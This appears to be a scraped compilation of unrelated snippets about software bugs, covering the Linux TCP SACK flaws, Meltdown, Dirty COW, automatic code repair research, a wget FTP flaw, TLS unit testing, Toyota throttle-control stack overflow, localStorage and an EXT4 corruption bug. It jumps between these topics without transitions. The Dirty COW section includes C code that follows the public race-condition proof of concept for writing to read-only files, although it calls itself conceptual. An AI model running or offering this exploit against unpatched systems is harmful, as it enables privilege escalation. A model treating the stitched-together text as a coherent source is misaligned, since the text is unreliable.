With CVE-2019-11477, a sequence of TCP SACK responses can cause the Linux kernel to unexpectedly hit an internal data structure limit, triggering a fatal panic. The other SACK-related flaws affecting Linux force the system to consume resources, slowing it down, as Red Hat explained in its technical summary today.
A fundamental design flaw in Intel’s processor chips has forced a significant redesign of the Linux and Windows kernels to defang the chip-level security bug.
There were rumors of a severe hypervisor bug – possibly in Xen – doing the rounds at the end of 2017. It may be that this hardware flaw is that rumored bug: that hypervisors can be attacked via this kernel memory access cockup, and thus need to be patched, forcing a mass restart of guest virtual machines.
The vulnerability, a variety known as a race condition, was found in the way Linux memory handles a duplication technique called copy on write. Untrusted users can exploit it to gain highly privileged write-access rights to memory mappings that would normally be read-only. More technical details about the vulnerability and exploit are available here, here, and here. Using the acronym derived from copy on write, some researchers have dubbed the vulnerability Dirty COW.
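To make the race concrete, the widely circulated proof-of-concept for Dirty COW follows a simple pattern: map a read-only file privately, then have one thread repeatedly write to the mapping through /proc/self/mem while a second thread keeps discarding the private copy with madvise(MADV_DONTNEED). Below is a rough sketch of that pattern in C; it is a conceptual illustration rather than a working exploit, the target path is a placeholder, and on a patched kernel the writes simply stay in the private copy.

```c
/* Conceptual sketch of the Dirty COW race (CVE-2016-5195).
 * On a patched kernel this has no effect beyond wasted CPU time. */
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

static void *map;          /* private, read-only mapping of the target file */
static struct stat st;

/* Thread 1: keep telling the kernel to drop the private pages,
 * forcing repeated copy-on-write faults. */
static void *madvise_thread(void *arg)
{
    (void)arg;
    for (int i = 0; i < 1000000; i++)
        madvise(map, st.st_size, MADV_DONTNEED);
    return NULL;
}

/* Thread 2: keep writing to the mapping via /proc/self/mem, which is
 * allowed despite PROT_READ and goes through the copy-on-write path. */
static void *write_thread(void *arg)
{
    const char *payload = arg;
    int fd = open("/proc/self/mem", O_RDWR);
    for (int i = 0; i < 1000000; i++) {
        lseek(fd, (off_t)(uintptr_t)map, SEEK_SET);
        write(fd, payload, strlen(payload));
    }
    close(fd);
    return NULL;
}

int main(void)
{
    /* Placeholder target: any file the user can read but not write. */
    int fd = open("/tmp/readonly_target", O_RDONLY);
    if (fd < 0 || fstat(fd, &st) < 0)
        return 1;

    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED)
        return 1;

    pthread_t t1, t2;
    pthread_create(&t1, NULL, madvise_thread, NULL);
    pthread_create(&t2, NULL, write_thread, "overwritten");
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    return 0;
}
```

The bug was that, under this race, the kernel could lose track of the copy-on-write state and let the write land in the original read-only file instead of the private copy.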
From there, the Helium system replaces the original bit-rotted components with the re-optimized ones. The net result: Helium can improve the performance of certain Photoshop filters by 75 percent, and the performance of less optimized programs, such as the Windows image viewer IrfanView, by 400 to 500 percent.
“We’ve found that Helium can make updates in one day that would take human engineers upwards of three months,” says Amarasinghe. “A system like this can help companies make sure that the next generation of code is faster, and save them the trouble of putting 100 people on these sorts of problems.”
Having the ability to automatically fix bad code is like the introduction of autofocus on cameras to fix bad focus, or Auto-Tune to fix bad singing. The downside might be that development teams choose to do fewer code reviews, releasing more bad code into the wild and relying on these automatic techniques to fix everything.
Here’s another article recently published by MIT News about this concept.
Remarkably, the system, dubbed CodePhage, doesn’t require access to the source code of the applications whose functionality it’s borrowing. Instead, it analyzes the applications’ execution and characterizes the types of security checks they perform. As a consequence, it can import checks from applications written in programming languages other than the one in which the program it’s repairing was written.
Source: Automatic bug repair | MIT News
Linus Torvalds’ own investigation suggests it might be related to the kernel’s watchdog code. “So I’m looking at the watchdog code, and it seems racy [with regard to] parking and startup…Quite frankly, I’m just grasping for straws here, but a lot of the watchdog traces really have seemed spurious…”
“It was found that wget was susceptible to a symlink attack which could create arbitrary files, directories or symbolic links and set their permissions when retrieving a directory recursively through FTP,” developer Vasyl Kaigorodov wrote in a Red Hat Bugzilla comment. –
Wget is a Linux command-line tool that allows a shell script to download a web page and store it in a file. This bug pertains to retrieving URLs over the File Transfer Protocol (FTP) rather than HTTP, the protocol wget is most commonly used for. Here are a couple more snippets about this bug.
“Random bug found by accident, but the implication is that the FTP server can overwrite your entire filesystem,” Moore tweeted to eWEEK.
Don’t use wget for FTP. Don’t run wget with root permissions.
So just to recap here: Wget is on nearly every Linux server in the world, and it had a flaw that could have let a malicious FTP server create or overwrite arbitrary files on the machine running it. That’s very serious.
You should only use wget for HTTP downloads. This doesn’t sound like one of those “Internet dodges a bullet” problems.
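For what it’s worth, a script that only needs a plain HTTP download doesn’t have to shell out to wget at all. The sketch below does the equivalent fetch-and-save with libcurl; the URL and output filename are placeholders, and error handling is kept to a minimum.

```c
/* Minimal HTTP fetch-and-save with libcurl. Build with: cc fetch.c -lcurl */
#include <stdio.h>
#include <curl/curl.h>

/* Write callback: append received bytes to the output file. */
static size_t write_to_file(void *ptr, size_t size, size_t nmemb, void *stream)
{
    return fwrite(ptr, size, nmemb, (FILE *)stream);
}

int main(void)
{
    FILE *out = fopen("index.html", "wb");   /* placeholder output path */
    if (!out)
        return 1;

    curl_global_init(CURL_GLOBAL_DEFAULT);
    CURL *curl = curl_easy_init();
    if (curl) {
        /* Placeholder URL -- HTTP only, as the advice above suggests. */
        curl_easy_setopt(curl, CURLOPT_URL, "http://example.com/");
        curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_to_file);
        curl_easy_setopt(curl, CURLOPT_WRITEDATA, out);
        curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);

        CURLcode res = curl_easy_perform(curl);
        if (res != CURLE_OK)
            fprintf(stderr, "download failed: %s\n", curl_easy_strerror(res));

        curl_easy_cleanup(curl);
    }
    fclose(out);
    curl_global_cleanup();
    return 0;
}
```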
As demonstrated, this vulnerability wasn’t a result of insufficient system testing; it was because of insufficient unit testing. Keith Ray himself wrote a “Testing on the Toilet” [8] article, “Too Many Tests” [11], explaining how to break complex logic into small, testable functions to avoid a combinatorial explosion of inputs and still achieve coverage of critical corner cases (“equivalence class partitioning”). Given the complexity of the TLS algorithm, unit testing should be the first line of defense, not system testing. When six copies of the same algorithm exist, system testers are primed for failure.
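To illustrate the idea (this is a toy example, not code from the TLS stack in question), the sketch below pulls one small decision into a pure function and covers each equivalence class of its input with a single assertion; the function name and the bounds are made up.

```c
/* Toy example of equivalence class partitioning: extract a small, pure
 * function and cover each class of input with one representative test. */
#include <assert.h>
#include <stdbool.h>

/* Hypothetical check: accept record lengths from 1 up to 16384 bytes. */
static bool record_length_ok(long len)
{
    return len >= 1 && len <= 16384;
}

int main(void)
{
    /* One test per equivalence class, plus the boundary values. */
    assert(!record_length_ok(-1));      /* class: negative */
    assert(!record_length_ok(0));       /* boundary: just below valid range */
    assert(record_length_ok(1));        /* boundary: smallest valid value */
    assert(record_length_ok(8000));     /* class: typical valid value */
    assert(record_length_ok(16384));    /* boundary: largest valid value */
    assert(!record_length_ok(16385));   /* boundary: just above valid range */
    return 0;
}
```

A handful of assertions like these cover the interesting corner cases of the extracted function without having to drive the whole protocol through a system test.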
Unless you’ve been living under a rock for the past couple of years, you must have heard of the Toyota unintended acceleration (UA) cases, where Camry and other Toyota vehicles accelerated unexpectedly; some of these incidents killed people, and all of them scared the hell out of their drivers.
The recent trial testimony delivered at the Oklahoma trial by embedded guru Michael Barr offers, for the first time in the history of these trials, a glimpse into the Toyota throttle control software. In his deposition, Michael explains how a stack overflow could corrupt the critical variables of the operating system (OSEK in this case), because they were located in memory adjacent to the top of the stack. The following two slides from Michael’s testimony explain the memory layout around the stack and why stack overflow was likely in the Toyota code (see the complete set of Michael’s slides).
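One common embedded-systems countermeasure for exactly this failure mode, independent of anything Toyota or Barr did, is to “paint” each task stack with a known pattern at startup and periodically check how much of it is still untouched. The sketch below simulates that check on an ordinary array standing in for a task stack; the region size, pattern, and usage numbers are invented for the example.

```c
/* Stack "painting" / high-water-mark check, simulated on a plain array. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical reserved stack region -- on a real RTOS this would be the
 * task's stack as declared in the OS configuration, not a plain array. */
#define STACK_WORDS 256
static uint32_t task_stack[STACK_WORDS];

#define STACK_PAINT 0xDEADBEEFu

/* Fill the whole stack region with a known pattern before the task runs. */
static void stack_paint(uint32_t *stack, size_t words)
{
    for (size_t i = 0; i < words; i++)
        stack[i] = STACK_PAINT;
}

/* Count how many words at the far end still hold the paint pattern.
 * Assuming a descending stack, the untouched words sit at the low end,
 * so the count is the margin left before the stack runs into whatever
 * memory lies just past it. */
static size_t stack_unused_words(const uint32_t *stack, size_t words)
{
    size_t unused = 0;
    while (unused < words && stack[unused] == STACK_PAINT)
        unused++;
    return unused;
}

int main(void)
{
    stack_paint(task_stack, STACK_WORDS);

    /* Simulate a task that used 200 of the 256 words. */
    memset(task_stack + 56, 0, (STACK_WORDS - 56) * sizeof(uint32_t));

    size_t margin = stack_unused_words(task_stack, STACK_WORDS);
    printf("stack margin: %zu of %u words untouched\n",
           margin, (unsigned)STACK_WORDS);
    if (margin == 0)
        printf("warning: stack may have overflowed into adjacent memory\n");
    return 0;
}
```

On a real RTOS the same scan would run against the stack area reserved for each task, and a shrinking margin is the early warning that critical data sitting just past the end of the stack is at risk.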
The HTML5 Web Storage standard was developed to allow sites to store larger amounts of data (like 5-10 MB) than was previously allowed by cookies (like 4KB).
localStorage is awesome because it’s supported in all modern browsers (Chrome, Firefox 3.5+, Safari 4+, IE 8+, etc.).
As a warning for those who are normally quick to upgrade to the latest stable vanilla kernel releases, a serious EXT4 data corruption bug worked its way into the stable Linux 3.4, 3.5, and 3.6 kernel series.
The reason why the problem happens rarely is that the effect of the buggy commit is that if the journal’s starting block is zero, we fail to truncate the journal when we unmount the file system. This can happen if we mount and then unmount the file system fairly quickly, before the log has a chance to wrap. After the first time this has happened, it’s not a disaster, since when we replay the journal, we’ll just replay some extra transactions. But if this happens twice, the oldest valid transaction will still not have gotten updated, but some of the newer transactions from the last mount session will have gotten overwritten by the very latest transactions, and when we then try to do the extra transaction replays, the metadata blocks can end up getting very scrambled indeed.